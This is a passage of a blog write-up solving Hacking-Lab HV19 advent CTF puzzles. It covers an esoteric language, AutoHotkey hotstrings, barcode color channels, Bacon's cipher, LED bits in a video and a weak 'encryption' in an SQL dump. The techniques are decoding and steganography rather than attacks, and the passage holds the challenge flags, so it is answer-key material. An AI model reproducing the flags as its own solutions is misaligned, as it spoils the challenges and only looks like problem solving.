HooodorrHODOR Hodor- HODORHoOodoOor HODOR!?! HODOR... DHODORHoOodoOor hodor. Hodor! HoOodoOorHodor HODORHoOodoOor 0Hooodorrhodor HoOodoOorHooodorrHODOR 0=`;\n<br\/>hodor.hod(hhodor. Hodor. Hodor!? );<\/pre><\/td><\/tr><\/tbody><\/table>\n<br\/>Googling for <code>hodor language<\/code> reveals this page: <a href=\"http:\/\/www.hodor-lang.org\/\" rel=\"noopener noreferrer\" target=\"_blank\">www.hodor-lang.org<\/a>.\n<br\/>\n<br\/>Accordingly we only have to install the npm package <code>hodor-lang<\/code> &#8230;\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/03# npm install -g hodor-lang\n\/usr\/local\/bin\/hodor -&gt; \/usr\/local\/lib\/node_modules\/hodor-lang\/bin\/hodor\n\/usr\/local\/bin\/js2hd -&gt; \/usr\/local\/lib\/node_modules\/hodor-lang\/bin\/js2hd\n+ hodor-lang@1.0.2\nadded 54 packages from 41 contributors in 2.283s<\/pre>\n<br\/>&#8230; and run the provided program:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/03# hodor hv03.hd \nHODOR: \\-&gt; hv03.hd\nAwesome, you decoded Hodors language! \n\nAs sis a real h4xx0r he loves base64 as well.\n\nSFYxOXtoMDFkLXRoMy1kMDByLTQyMDQtbGQ0WX0=<\/pre>\n<br\/>Base64-decoding the output string yields the flag:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/03# echo SFYxOXtoMDFkLXRoMy1kMDByLTQyMDQtbGQ0WX0=|base64 -d\nHV19{h01d-th3-d00r-4204-ld4Y}<\/pre>\n<br\/>The flag is <span class=\"spanFlag\">HV19{h01d-th3-d00r-4204-ld4Y}<\/span>.\n<br\/><br\/>\n<hr id=\"chlgHV19.04\"\/><span style=\"float:right;\"><a href=\"\">return to overview &#x21E7;<\/a><\/span><h1>HV19.04 &#8211; password&nbsp;policy&nbsp;circumvention<\/h1>\n<table class=\"chlgTable\"><tbody><tr><td width=\"130\"><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/ball_04.png\" \/><\/td><td style=\"color:#333333\">Author: DanMcFly<\/td><\/tr><tr><td colspan=\"2\">Santa released a new password policy (more than 40 characters, upper, lower, digit, special).\n<br\/>\n<br\/>The elves can&#8217;t remember such long passwords, so they found a way to continue to use their old (bad) password:\n<br\/><pre style=\"white-space:pre-wrap;font-size:16px;\">merry christmas geeks<\/pre><span class=\"link\">HV19-PPC.zip<\/span>\n<br\/><\/td><\/tr><\/tbody><\/table>\n<br\/>The provided zip archive contains a AutoHotkey file (<code>.ahk<\/code>):\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/04# unzip 6473254e-1cb3-444e-9dac-5baeaaaf6d11.zip \nArchive:  6473254e-1cb3-444e-9dac-5baeaaaf6d11.zip\n  inflating: HV19-PPC.ahk            \nroot@kali:~\/hv19\/04# file HV19-PPC.ahk \nHV19-PPC.ahk: UTF-8 Unicode (with BOM) text, with CRLF line terminators\nroot@kali:~\/hv19\/04# cat HV19-PPC.ahk \n::merry::\nFormatTime , x,, MM MMMM yyyy\nSendInput, %x%{left 4}{del 2}+{right 2}^c{end}{home}^v{home}V{right 2}{ASC 00123}\nreturn\n\n::christmas::\nSendInput HV19-pass-w0rd\nreturn\n\n:*?:is::\nSend - {del}{right}4h\n\n:*?:as::\nSend {left 8}rmmbr{end}{ASC 00125}{home}{right 10}\nreturn\n\n:*?:ee::\nSend {left}{left}{del}{del}{left},{right}e{right}3{right 2}e{right}{del 5}{home}H{right 4}\nreturn\n\n:*?:ks::\nSend {del}R3{right}e{right 2}3{right 2} {right 8} {right} the{right 3}t{right} 0f{right 3}{del}c{end}{left 5}{del 4}\nreturn\n\n::xmas::\nSendInput, -Hack-Vent-Xmas\nreturn\n\n::geeks::\nSend -1337-hack\nreturn<\/pre>\n<br\/>The file defines hotkeys \/ hotstrings which can be used with the software <a href=\"https:\/\/www.autohotkey.com\/\" rel=\"noopener noreferrer\" target=\"_blank\">AutoHotkey<\/a>.\n<br\/>\n<br\/>When entering the password <code>merry christmas geeks<\/code> different hotstrings defined within the file are matched and the hotstrings are replaced with the corresponding key strokes.\n<br\/>\n<br\/>If we don&#8217;t want to carry out the replacement on our own, the easiest way is to simply install AutoHotkey, load the script and enter the password.\n<br\/>\n<br\/>After installing AutoHotkey on a windows machine, we can simply double-click the <code>.ahk<\/code> file in order to load the script.\n<br\/>\n<br\/>Now we can open notepad and enter the password. One thing to notice here is that we have to wait for each replacement to be finished. Otherwise the resulting string (the flag) gets messed up because our key strokes are interpreted before the replacing key strokes were finished. Thus we enter:\n<br\/>\n<br\/><code>merry [PAUSE]chris[PAUSE]tmas[PAUSE] gee[PAUSE]ks<\/code>\n<br\/>\n<br\/>Result after entering <code>\"merry \"<\/code>:\n<br\/>\n<br\/><code>V19{12 December 19<\/code>\n<br\/>\n<br\/>Continuing with <code>\"chris\"<\/code>:\n<br\/>\n<br\/><code>V19{rmmbrchr- 24h December 19}<\/code>\n<br\/>\n<br\/>Followed by <code>\"tmas\"<\/code>:\n<br\/>\n<br\/><code>V19{rmmbrrmmbrctmhr- 24h December 19}}<\/code>\n<br\/>\n<br\/>Going on with <code>\" gee\"<\/code>:\n<br\/>\n<br\/><code>HV19{rmmbr,rem3mber- 24h December 19}}<\/code>\n<br\/>\n<br\/>Finishing with <code>\"ks\"<\/code>:\n<br\/>\n<br\/><code>HV19{R3memb3r, rem3mber - the 24th 0f December}<\/code>\n<br\/>\n<br\/>The flag is <span class=\"spanFlag\">HV19{R3memb3r, rem3mber &#8211; the 24th 0f December}<\/span>.\n<br\/><br\/>\n<hr id=\"chlgHV19.05\"\/><span style=\"float:right;\"><a href=\"\">return to overview &#x21E7;<\/a><\/span><h1>HV19.05 &#8211; Santa&nbsp;Parcel&nbsp;Tracking<\/h1>\n<table class=\"chlgTable\"><tbody><tr><td width=\"130\"><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/ball_05.png\" \/><\/td><td style=\"color:#333333\">Author: inik<\/td><\/tr><tr><td colspan=\"2\">To handle the huge load of parcels Santa introduced this year a parcel tracking system. He didn&#8217;t like the black and white barcode, so he invented a more solemn barcode. Unfortunately the common barcode readers can&#8217;t read it anymore, it only works with the pimped models santa owns. Can you read the barcode\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/05_01_barcode.png\" \/>\n<br\/><\/td><\/tr><\/tbody><\/table>\n<br\/>The provided barcode can for example be scanned using <a href=\"https:\/\/zxing.org\/w\/decode.jspx\" rel=\"noopener noreferrer\" target=\"_blank\">zxing.org<\/a>:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/05_02_scan_barcode.png\" \/>\n<br\/>\n<br\/>Though this is obviously <i>Not the solution<\/i>.\n<br\/>\n<br\/>Just by viewing the barcode, we can see that the color of each bar is slightly different.\n<br\/>\n<br\/>In order to inspect the exact values, we can write a python script which prints the RGB value of each bar by iterating through the horizontal line of pixels and printing the first value after a white pixel (<code>255,255,255<\/code>):\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">#!\/usr\/bin\/env python\n\nfrom PIL import Image\n\nim = Image.open('code.png')\npix = im.load()\n\nlastWhite = False\n\nfor w in range(im.size[0]):\n  p = pix[w,10]\n  if (p != (255,255,255)):\n    if (lastWhite):\n      lastWhite = False\n      print(p)\n  else:\n    lastWhite = True<\/pre>\n<br\/>Running the script outputs the RGB value of each bar:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">\nroot@kali:~\/hv19\/05# .\/extract.py \n(115, 80, 88)\n(116, 89, 56)\n(108, 80, 89)\n(109, 69, 73)\n(114, 49, 79)\n(121, 51, 70)\n(115, 80, 48)\n(101, 81, 90)\n(103, 56, 80)\n(122, 57, 52)\n(117, 76, 83)\n(104, 84, 56)\n...\n<\/pre>\n<br\/>The value for black would be <code>(0,0,0)<\/code>, but these values are quite higher. Also the values look suspiciously matching in the ASCII range. Accordingly, let&#8217;s extract the value for each channel (<code>R,G,B<\/code>) and see if we can find something useful if we interpret the values as ASCII characters. In order to do this, only a slight adjustment of the former script is required:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">#!\/usr\/bin\/env python\n\nfrom PIL import Image\n\nim = Image.open('code.png')\npix = im.load()\n\nlastWhite = False\nr = ''; g = ''; b = ''\nfor w in range(im.size[0]):\n  p = pix[w,10]\n  if (p != (255,255,255)):\n    if (lastWhite):\n      lastWhite = False\n      r += chr(p[0])\n      g += chr(p[1])\n      b += chr(p[2])\n  else:\n    lastWhite = True\n\nprint(r)\nprint(g)\nprint(b)<\/pre>\n<br\/>Running the script &#8230;\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/05# .\/extractASCII.py \nstlmrysegzuhezagltlgxzgjiivvssaiewbtuhalqclfqrcwfqvengxekoaltyve\nPYPE13PQ89LTG0X0OOJJIIUSHQ60MIQI4S9EG48NVVP65GOXL0VWJW2323SRU8BB\nX8YIOF0ZP4S8HV19{D1fficult_to_g3t_a_SPT_R3ader}S1090OMZE0E3NFP6E\n<\/pre>\n<br\/>&#8230; actually yields the flag within the <code>B<\/code> channel!\n<br\/>\n<br\/>The flag is <span class=\"spanFlag\">HV19{D1fficult_to_g3t_a_SPT_R3ader}<\/span>.\n<br\/><br\/>\n<hr id=\"chlgHV19.06\"\/><span style=\"float:right;\"><a href=\"\">return to overview &#x21E7;<\/a><\/span><h1>HV19.06 &#8211; bacon&nbsp;and&nbsp;eggs<\/h1>\n<table class=\"chlgTable\"><tbody><tr><td width=\"130\"><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/ball_06.png\" \/><\/td><td style=\"color:#333333\">Author: T.B.<\/td><\/tr><tr><td colspan=\"2\"><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/06_01_bacon.jpg\" \/>\n<br\/><p style=\"font-style:normal;\"><i>F<\/i>ra<i>n<\/i>cis Baco<i>n<\/i> <i>w<\/i>a<i>s<\/i> <i>a<\/i>n E<i>ng<\/i>lish ph<i>i<\/i>l<i>os<\/i>o<i>p<\/i>her a<i>n<\/i>d <i>s<\/i>tat<i>e<\/i>sm<i>a<\/i>n w<i>h<\/i>o se<i>rve<\/i>d <i>a<\/i>s At<i>t<\/i>or<i>n<\/i>ey Gen<i>e<\/i>ral and as <i>L<\/i>or<i>d<\/i> <i>Ch<\/i>an<i>ce<\/i>l<i>l<\/i>or of <i>En<\/i>g<i>l<\/i>an<i>d<\/i>. Hi<i>s<\/i> <i>w<\/i>orks ar<i>e<\/i> c<i>red<\/i>it<i>e<\/i>d w<i>ith<\/i> d<i>e<\/i>ve<i>lo<\/i>pi<i>ng<\/i> <i>t<\/i>h<i>e<\/i> sci<i>e<\/i>nt<i>i<\/i>fic me<i>t<\/i>hod and re<i>m<\/i>ai<i>ned<\/i> in<i>fl<\/i>u<i>en<\/i>ti<i>al<\/i> th<i>rou<\/i>gh <i>t<\/i>he s<i>cien<\/i>tific <i>r<\/i>ev<i>o<\/i>l<i>u<\/i>ti<i>o<\/i>n.\n<br\/><i>B<\/i>a<i>co<\/i>n h<i>as<\/i> <i>b<\/i>e<i>e<\/i>n ca<i>l<\/i>led <i>th<\/i>e <i>f<\/i>ath<i>e<\/i>r o<i>f<\/i> emp<i>iric<\/i>i<i>s<\/i>m. <i>Hi<\/i>s <i>wor<\/i>ks ar<i>g<\/i>ued for th<i>e<\/i> po<i>ssi<\/i>bi<i>li<\/i>t<i>y<\/i> of s<i>c<\/i>ie<i>n<\/i>tifi<i>c<\/i> <i>kno<\/i>wl<i>edg<\/i>e b<i>a<\/i>se<i>d<\/i> onl<i>y<\/i> u<i>p<\/i>on i<i>n<\/i>du<i>c<\/i>t<i>i<\/i>ve <i>r<\/i>ea<i>s<\/i>onin<i>g<\/i> <i>a<\/i>nd c<i>aref<\/i>u<i>l<\/i> o<i>bs<\/i>er<i>v<\/i>ation o<i>f<\/i> <i>e<\/i>v<i>e<\/i>nt<i>s<\/i> in <i>na<\/i>tur<i>e<\/i>. Mo<i>st<\/i> <i>i<\/i>mp<i>ort<\/i>an<i>t<\/i>l<i>y<\/i>, <i>he<\/i> a<i>rgue<\/i>d sc<i>i<\/i>en<i>c<\/i>e co<i>uld<\/i> <i>b<\/i>e <i>a<\/i>c<i>hi<\/i>eved by us<i>e<\/i> of a <i>s<\/i>ce<i>p<\/i>t<i>ical<\/i> a<i>nd<\/i> me<i>t<\/i>hod<i>i<\/i>ca<i>l<\/i> <i>a<\/i>pp<i>roa<\/i>ch wh<i>er<\/i>eby <i>s<\/i>cientist<i>s<\/i> ai<i>m<\/i> t<i>o<\/i> avo<i>i<\/i>d m<i>i<\/i>sl<i>ead<\/i>in<i>g<\/i> themsel<i>ve<\/i>s. <i>A<\/i>lth<i>oug<\/i>h <i>h<\/i>is <i>p<\/i>ra<i>c<\/i>tic<i>a<\/i>l i<i>d<\/i>e<i>a<\/i>s ab<i>out<\/i> <i>s<\/i>u<i>ch<\/i> <i>a<\/i> <i>m<\/i>et<i>h<\/i>od, <i>t<\/i>he B<i>a<\/i>con<i>i<\/i>an meth<i>o<\/i>d, d<i>i<\/i>d no<i>t<\/i> have <i>a<\/i> l<i>o<\/i>n<i>g<\/i>&#8211;<i>la<\/i>s<i>t<\/i>ing <i>i<\/i>nfluen<i>c<\/i>e, <i>th<\/i>e <i>g<\/i>e<i>ne<\/i>ral <i>i<\/i>dea <i>of<\/i> <i>t<\/i>he imp<i>o<\/i>rta<i>n<\/i>ce and pos<i>s<\/i>i<i>b<\/i>il<i>it<\/i>y o<i>f<\/i> a s<i>c<\/i>ept<i>i<\/i>cal methodology makes Bacon the father of the scientific method. This method was a new rhetorical and theoretical framework for science, the practical details of which are still central in debates about science and methodology.\n<br\/>\n<br\/>Bacon was the first recipient of the Queen&#8217;s counsel designation, which was conferred in 1597 when Elizabeth I of England reserved Bacon as her legal advisor. After the accession of James VI and I in 1603, Bacon was knighted. He was later created Baron Verulam in 1618 and Viscount St. Alban in 1621.\n<br\/>Because he had no heirs, both titles became extinct upon his death in 1626, at 65 years. Bacon died of pneumonia, with one account by John Aubrey stating that he had contracted the condition while studying the effects of freezing on the preservation of meat. He is buried at St Michael&#8217;s Church, St Albans, Hertfordshire.\n<br\/><pre>\n<br\/>Born: January 22\t     \t \t   \t   \t \t       \t     \t  \t  \n<br\/>Died: April 9   \t  \t \t    \t  \t      \t   \t\t  \t  \n<br\/>Mother: Lady Anne   \t\t \t   \t   \t      \t  \t      \t  \n<br\/>Father: Sir Nicholas\t \t      \t\t    \t    \t  \t  \t      \t      \n<br\/>Secrets: unknown      \t \t  \t \t    \t    \t   \t       \t  \n<br\/><\/pre><\/p><\/td><\/tr><\/tbody><\/table>\n<br\/>The challenge is in the crypto category and the mentioned <a href=\"https:\/\/en.wikipedia.org\/wiki\/Francis_Bacon\" rel=\"noopener noreferrer\" target=\"_blank\">Francis Bacon<\/a> devised a cipher called <a href=\"https:\/\/en.wikipedia.org\/wiki\/Bacon%27s_cipher\" rel=\"noopener noreferrer\" target=\"_blank\">Bacon&#8217;s cipher<\/a>.\n<br\/>\n<br\/>The Bacon&#8217;s cipher maps 5-bit on a single letter (eg. <code>01010 --> K<\/code>). These bits can be encoded within a text by using different font-styles for subsequent letters. An emphasized letter is mapped to <code>1<\/code> and a non-emphasized letter to <code>0<\/code>. Applying this to the above text the first letter (<code>F<\/code>) is emphasized (&#8211;> <code>1<\/code>), the next two letters (<code>ra<\/code>) are not (&#8211;> <code>100<\/code>), the next one (<code>n<\/code>) is emphasized again (&#8211;> <code>1001<\/code>) and so forth.\n<br\/>\n<br\/>Notice that we have to remove any non-alpha characters from the text beforehand. The following python script reads the input text (stored in <code>text.txt<\/code>) and separates the text in emphasized and non-emphasized letters by splitting it using the <code>&lt;em&gt;<\/code> and <code>&lt;\/em&gt;<\/code> tags. After this all non-alpha characters are removed and the emphasized and non-emphasized letters are replaced with <code>1<\/code> and <code>0<\/code>. Finally a space is inserted after each 5 bits:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">#!\/usr\/bin\/env python\n\nimport re\n\ntxt = open('text.txt').read()\n# use a '0' as separator\ntxt = txt.replace('&lt;em&gt;','0').replace('&lt;\/em&gt;','0')\n# remove all non letter chars (also keep separator)\ntxt = re.sub('[^a-zA-Z0]', '', txt)\n\n# split by separator\na = txt.split('0')[1:]\nct = ''\nfor i in range(len(a)):\n  if (i%2 == 0): ct += '1'*len(a[i])\n  else: ct += '0'*len(a[i])\n\nct = re.sub('(.{5})', '\\\\1 ', ct, 0, re.DOTALL)\nprint(ct)<\/pre>\n<br\/>Running the script yields the ciphertext:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/06# .\/extract.py \n10010 00000 01101 10011 00000 01011 01000 01010 00100 10010 00111 01000 10010 00001 00000 00010 01110 01101 00001 10100 10011 00000 01011 10010 01110 10011 00111 01000 10010 00001 00000 00010 01110 01101 10011 00111 00100 01111 00000 10010 10010 10110 01110 10001 00011 01000 10010 00111 10101 10111 00001 00000 00010 01110 01101 00010 01000 01111 00111 00100 10001 01000 10010 10010 01000 01100 01111 01011 00100 00001 10100 10011 00010 01110 01110 01011 10111 10001 00100 01111 01011 00000 00010 00100 10111 10110 01000 10011 00111 00001 10001 00000 00010 01010 00100 10011 10010 00000 01101 00011 10100 10010 00100 10100 01111 01111 00100 10001 00010 00000 10010 00100 00101 01110 10001 00000 01011 01011 00010 00111 00000 10001 00000 00010 10011 00100 10001 00000 00000 00000 00000 00000 00000 00000 00000 00000 00000 00000 00000 00000 00000 00000 00000 00000 00000 00000 00000 00000 00000 00000 00000 00000 00000 00000 00000 00000 00000 00000 00000 00000 00000 00000 00000 00000 00000\n<\/pre>\n<br\/>The end of the text does not contain actual ciphertext anymore, which means that we can ignore the <code>00000<\/code> at the end.\n<br\/>\n<br\/>Now we can for example use <a href=\"https:\/\/gchq.github.io\/CyberChef\/\" rel=\"noopener noreferrer\" target=\"_blank\">CyberChef<\/a> to decrypt the ciphertext:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/06_02_cyberchef.png\" \/>\n<br\/>\n<br\/>The plaintext is <code>SANTALIKESHISBACONBUTALSOTHISBACONTHEPASSWORDISHVXBACONCIPHERISSIMPLEBUTCOOLXREPLACEXWITHBRACKETSANDUSEUPPERCASEFORALLCHARACTER<\/code>.\n<br\/>\n<br\/>Please notice that we also have to insert <code>19<\/code> after <code>HV<\/code> at the beginning of the flag.\n<br\/>\n<br\/>The flag is <span class=\"spanFlag\">HV19{BACONCIPHERISSIMPLEBUTCOOL}<\/span>.\n<br\/><br\/>\n<hr id=\"chlgHV19.07\"\/><span style=\"float:right;\"><a href=\"\">return to overview &#x21E7;<\/a><\/span><h1>HV19.07 &#8211; Santa&nbsp;Rider<\/h1>\n<table class=\"chlgTable\"><tbody><tr><td width=\"130\"><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/ball_07.png\" \/><\/td><td style=\"color:#333333\">Author: inik<\/td><\/tr><tr><td colspan=\"2\">Santa is prototyping a new gadget for his sledge. Unfortunately it still has some glitches, but look for yourself.\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/07_01_movie.png\" \/>\n<br\/>\n<br\/>For easy download, get it here: <span class=\"link\">HV19-SantaRider.zip<\/span><\/td><\/tr><\/tbody><\/table>\n<br\/>The provided zip archive contains the mp4 video visible in the above screenshot:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/07# unzip 3dbe0c12-d794-4f79-ae67-09ac27bd099d.zip\nArchive:  3dbe0c12-d794-4f79-ae67-09ac27bd099d.zip\n  inflating: 3DULK2N7DcpXFg8qGo9Z9qEQqvaEDpUCBB1v.mp4\nroot@kali:~\/hv19\/07# file 3DULK2N7DcpXFg8qGo9Z9qEQqvaEDpUCBB1v.mp4\n3DULK2N7DcpXFg8qGo9Z9qEQqvaEDpUCBB1v.mp4: ISO Media, MP4 Base Media v1 [IS0 14496-12:2003]<\/pre>\n<br\/>At the beginning and the end of the video, the LEDs light up one after another in a smooth rhythm. Though in the middle of the video, different LEDs are lighting up in a quick transition.\n<br\/>\n<br\/>In order to inspect the patterns in which the LEDs are lighting up, we start by extracting all frames of the video using <code>ffmpeg<\/code>:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/07# ffmpeg -ss 00:00 -i 3DULK2N7DcpXFg8qGo9Z9qEQqvaEDpUCBB1v.mp4 -t 23:00 mov%05d.png\nffmpeg version 4.1.3-1 Copyright (c) 2000-2019 the FFmpeg developers\n  built with gcc 8 (Debian 8.3.0-7)\n  configuration: --prefix=\/usr --extra-version=1 --toolchain=hardened ...\n  libavutil      56. 22.100 \/ 56. 22.100\n  libavcodec     58. 35.100 \/ 58. 35.100\n  libavformat    58. 20.100 \/ 58. 20.100\n  libavdevice    58.  5.100 \/ 58.  5.100\n  libavfilter     7. 40.101 \/  7. 40.101\n  libavresample   4.  0.  0 \/  4.  0.  0\n  libswscale      5.  3.100 \/  5.  3.100\n  libswresample   3.  3.100 \/  3.  3.100\n  libpostproc    55.  3.100 \/ 55.  3.100\nInput #0, mov,mp4,m4a,3gp,3g2,mj2, from '3DULK2N7DcpXFg8qGo9Z9qEQqvaEDpUCBB1v.mp4':\n  Metadata:\n    major_brand     : isom\n    minor_version   : 512\n    compatible_brands: isomiso2avc1mp41\n    encoder         : Lavf58.20.100\n  Duration: 00:00:22.59, start: 0.000000, bitrate: 925 kb\/s\n    Stream #0:0(und): Video: h264 (High) (avc1 \/ 0x31637661), yuv420p(tv, bt709\/unknown\/bt709), 1280x720 [SAR 1:1 DAR 16:9], 914 kb\/s, 30 fps, 30 tbr, 15360 tbn, 60 tbc (default)\n    Metadata:\n      handler_name    : VideoHandler\n    Stream #0:1(und): Audio: aac (LC) (mp4a \/ 0x6134706D), 48000 Hz, stereo, fltp, 2 kb\/s (default)\n    Metadata:\n      handler_name    : SoundHandler\nStream mapping:\n  Stream #0:0 -&gt; #0:0 (h264 (native) -&gt; png (native))\nPress [q] to stop, [?] for help\nOutput #0, image2, to 'mov%05d.png':\n  Metadata:\n    major_brand     : isom\n    minor_version   : 512\n    compatible_brands: isomiso2avc1mp41\n    encoder         : Lavf58.20.100\n    Stream #0:0(und): Video: png, rgb24, 1280x720 [SAR 1:1 DAR 16:9], q=2-31, 200 kb\/s, 30 fps, 30 tbn, 30 tbc (default)\n    Metadata:\n      handler_name    : VideoHandler\n      encoder         : Lavc58.35.100 png\nframe=  677 fps= 13 q=-0.0 Lsize=N\/A time=00:00:22.56 bitrate=N\/A speed=0.422x\nvideo:479218kB audio:0kB subtitle:0kB other streams:0kB global headers:0kB muxing overhead: unknown<\/pre>\n<br\/>Now we can calmly inspect each frame. The irregular lighting begins approximately at frame 272:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/07_02_frames.png\" \/>\n<br\/>\n<br\/>Since there are 8 LEDs the assumption seems likely that each LED is a single bit in a byte. The first lightning pattern is <code>01001000<\/code>, which is ASCII for <code>H<\/code>. The next is <code>01010110<\/code>, which in turn is ASCII for <code>V<\/code>. This should be the flag \ud83d\ude42 Thus let&#8217;s write down all patterns (also writing down the frame number helps <i>debugging<\/i> if a single character seems wrong):\n<br\/><pre>\n<br\/>01001000      272\n<br\/>01010110      275\n<br\/>00110001      280\n<br\/>00111001      283\n<br\/>01111011      286\n<br\/>00110001      290\n<br\/>01101101      293\n<br\/>01011111      295\n<br\/>01100001      298\n<br\/>01101100      301\n<br\/>01110011      304\n<br\/>00110000      307\n<br\/>01011111      311\n<br\/>01110111      314\n<br\/>00110000      317\n<br\/>01110010      319\n<br\/>01101011      323\n<br\/>00110001      326\n<br\/>01101110      329\n<br\/>01100111      332\n<br\/>01011111      335\n<br\/>00110000      338\n<br\/>01101110      340\n<br\/>01011111      344\n<br\/>01100001      347\n<br\/>01011111      350\n<br\/>01110010      354\n<br\/>00110011      356\n<br\/>01101101      358\n<br\/>00110000      361\n<br\/>01110100      365\n<br\/>00110011      367\n<br\/>01011111      371\n<br\/>01100011      374\n<br\/>00110000      376\n<br\/>01101110      380\n<br\/>01110100      383\n<br\/>01110010      385\n<br\/>00110000      389\n<br\/>01101100      391\n<br\/>01111101      394\n<br\/><\/pre>After writing down all patterns, the following python script extracts the bit string of each line creating an ASCII string:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">#!\/usr\/bin\/env python\n\nlines = open('flag.txt').read().split('\\n')\nfl = ''\nfor line in lines[:-1]:\n  bitstr = line.split(' ')[0]\n  fl += chr(int(bitstr,2))\nprint(fl)<\/pre>\n<br\/>Running the script yields the flag:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/07# .\/printFlag.py\nHV19{1m_als0_w0rk1ng_0n_a_r3m0t3_c0ntr0l}\n<\/pre>\n<br\/>The flag is <span class=\"spanFlag\">HV19{1m_als0_w0rk1ng_0n_a_r3m0t3_c0ntr0l}<\/span>.\n<br\/><br\/>\n<hr id=\"chlgHV19.08\"\/><span style=\"float:right;\"><a href=\"\">return to overview &#x21E7;<\/a><\/span><h1>HV19.08 &#8211; SmileNcryptor&nbsp;4.0<\/h1>\n<table class=\"chlgTable\"><tbody><tr><td width=\"130\"><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/ball_08.png\" \/><\/td><td style=\"color:#333333\">Author: otaku<\/td><\/tr><tr><td colspan=\"2\">You hacked into the system of very-secure-shopping.com and you found a SQL-Dump with $$-creditcards numbers. As a good hacker you inform the company from which you got the dump. The managers tell you that they don&#8217;t worry, because the data is encrypted.\n<br\/>\n<br\/>Dump-File: <span class=\"link\">dump.zip<\/span>\n<br\/>\n<br\/>Analyze the &#8220;Encryption&#8221;-method and try to decrypt the flag.<\/td><\/tr><\/tbody><\/table>\n<br\/>The provided zip archive contains a mysql dump:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/08# unzip c635204a-6347-45d7-91f8-bd7b94b111f1.zip\nArchive:  c635204a-6347-45d7-91f8-bd7b94b111f1.zip\n  inflating: dump.sql\nroot@kali:~\/hv19\/08# file dump.sql\ndump.sql: ASCII text, with CRLF line terminators\nroot@kali:~\/hv19\/08# cat dump.sql\n-- MySQL dump 10.13  Distrib 5.7.19, for Win64 (x86_64)\n...\n\nCREATE TABLE `creditcards` (\n  `cc_id` int(11) NOT NULL AUTO_INCREMENT,\n  `cc_owner` varchar(64) DEFAULT NULL,\n  `cc_number` varchar(32) DEFAULT NULL,\n  `cc_expires` varchar(7) DEFAULT NULL,\n  PRIMARY KEY (`cc_id`)\n) ENGINE=InnoDB AUTO_INCREMENT=6 DEFAULT CHARSET=utf8;\n\/*!40101 SET character_set_client = @saved_cs_client *\/;\n\n...\n\nINSERT INTO `creditcards` VALUES\n(1,'Sirius Black',':)QVXSZUVY\\ZYYZ[a','12\/2020'),\n(2,'Hermione Granger',':)QOUW[VT^VY]bZ_','04\/2021'),\n(3,'Draco Malfoy',':)SPPVSSYVV\\YY_\\\\]','05\/2020'),\n(4,'Severus Snape',':)RPQRSTUVWXYZ[\\]^','10\/2020'),\n(5,'Ron Weasley',':)QTVWRSVUXW[_Z`\\b','11\/2020');\n\n...\n\nCREATE TABLE `flags` (\n  `flag_id` int(11) NOT NULL AUTO_INCREMENT,\n  `flag_prefix` varchar(5) NOT NULL,\n  `flag_content` varchar(29) NOT NULL,\n  `flag_suffix` varchar(1) NOT NULL,\n  PRIMARY KEY (`flag_id`)\n) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8;\n\/*!40101 SET character_set_client = @saved_cs_client *\/;\n\n...\n\nINSERT INTO `flags` VALUES (1,'HV19{',':)SlQRUPXWVo\\Vuv_n_\\ajjce','}');\n\n...\n<\/pre>\n<br\/>The <i>encrypted<\/i> data begins with a smiley (<code>:)<\/code>) followed by upper case letters, which at the end of the data turn into special characters and lower case letters.\n<br\/>\n<br\/>Actually this observation is very essential. Assuming that there is a one-to-one mapping from each byte of the <i>encrypted<\/i> data to an ASCII number of the creditcard numbers, there must be some kind of shift after each byte because the value of the bytes get bigger and bigger to the end of the 